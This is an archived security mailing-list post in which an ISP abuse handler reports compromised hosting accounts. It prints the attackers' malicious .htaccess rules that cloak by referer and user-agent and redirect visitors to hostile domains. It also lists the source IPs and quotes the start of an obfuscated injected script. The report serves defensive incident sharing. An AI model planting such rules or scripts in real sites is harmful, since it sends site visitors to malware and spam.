[nsp-sec] Old hack, popular again.

Scott A. McIntyre scott at xs4all.net
Fri Jan 8 02:13:26 EST 2010 

Hi all,

Over the last week or two we've had a real rise in webhosting accounts where FTP credentials were abused to upload and modify various files in a customer's hosting space.  Malicious javascript (I can send examples to those who want, some of it is very large and obfuscated) insertions into every HTML document is just one of the standard changes, but, perhaps more interesting is that over 40 of these accounts also had their .htaccess updated.

This is a very old hack, and we've seen it rise in popularity every few months, but this was a pretty big "update" so it seemed worth mentioning.  

The .htaccess files were modified in a few ways:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://techno-worlds.info/0/go.php?sid=2 [R,L]

Others had RewriteRules to:

RewriteRule .* http://auto-saloon.info/go.php [R,L]
RewriteRule .* http://mayatek.info/0/go.php?sid=2 [R,L]
RewriteRule .* http://stopthebailouts.info/go.php [R,L]
RewriteRule ^(.*)$ http://mefa.ws/2/news.php?s=1c1804616b [R=301,L]
RewriteRule ^(.*)$ http://newsreading.ru/ [R=301,L]

Some changes were relatively simple:

RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} (Googlebot|Slurp|msnbot)
RewriteRule ^ http://p0u.org/ [R=301,L]


Or:

RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} (Googlebot|Slurp|msnbot)
RewriteRule ^ http://webaliance.firm.in/ [R=301,L]

And incredibly simply:

#  HostRule
Redirect 301 / http://new-sneg.ru/
#  /HostRule


No points for guessing the country of origin of the trespassers...

The JavaScript changes were in some cases simple, others were huge.  

The FTP uploads came from a variety of locations:

3462    | 59.125.229.74    | HINET Data Communication Business Group
4323    | 216.120.234.156  | TWTC - tw telecom holdings, inc.
8767    | 193.34.144.189   | MNET-AS M-net AS
8767    | 193.34.144.208   | MNET-AS M-net AS
9680    | 59.125.229.74    | HINETUSA HiNet Service Center in U.S.A
19875   | 69.10.158.23     | IPWORLDNET - IPWorld Networks
21844   | 74.54.217.226    | THEPLANET-AS - ThePlanet.com Internet Services, Inc.
24826   | 91.213.121.91    | KHARKOV-TERMINALS-AS PE Viktor Nastechenko
28753   | 212.95.63.11     | NETDIRECT AS NETDIRECT Frankfurt, DE
28753   | 212.95.63.12     | NETDIRECT AS NETDIRECT Frankfurt, DE
28753   | 84.16.228.66     | NETDIRECT AS NETDIRECT Frankfurt, DE
28753   | 84.16.228.67     | NETDIRECT AS NETDIRECT Frankfurt, DE
28753   | 84.16.229.57     | NETDIRECT AS NETDIRECT Frankfurt, DE
28753   | 84.16.229.58     | NETDIRECT AS NETDIRECT Frankfurt, DE
28753   | 84.16.236.35     | NETDIRECT AS NETDIRECT Frankfurt, DE
28753   | 89.149.241.108   | NETDIRECT AS NETDIRECT Frankfurt, DE
28753   | 89.149.252.17    | NETDIRECT AS NETDIRECT Frankfurt, DE
29873   | 66.96.128.66     | BIZLAND-SD - The Endurance International Group, Inc.
44112   | 77.222.56.28     | SWEB-AS SpaceWeb JSC
48662   | 94.142.134.25    | CSSGROUP-AS SIA _CSS GROUP_
49314   | 91.212.198.131   | NEVAL PE Nevedomskiy Alexey Alexeevich

As I say, most of this is business as usual.  What's different was the relatively sudden rise (about a hundred accounts, but still verifying some of those) in only a few days.  

If anyone wants the javascript, shout, it will take a bit to grep all the various files and find the different variations...I found about a thousand files modified with:

<script>/*LGPL*/ try{ window.onload = function(){var Qgmf39m58nxy = document.createElement('s@^$c$&r#^(i$@)p!$t^!$'.replace(/\)|\(|&|@|\...

And many more variations.

Regards,

Scott A. McIntyre
XS4ALL Internet B.V.

More information about the nsp-security mailing list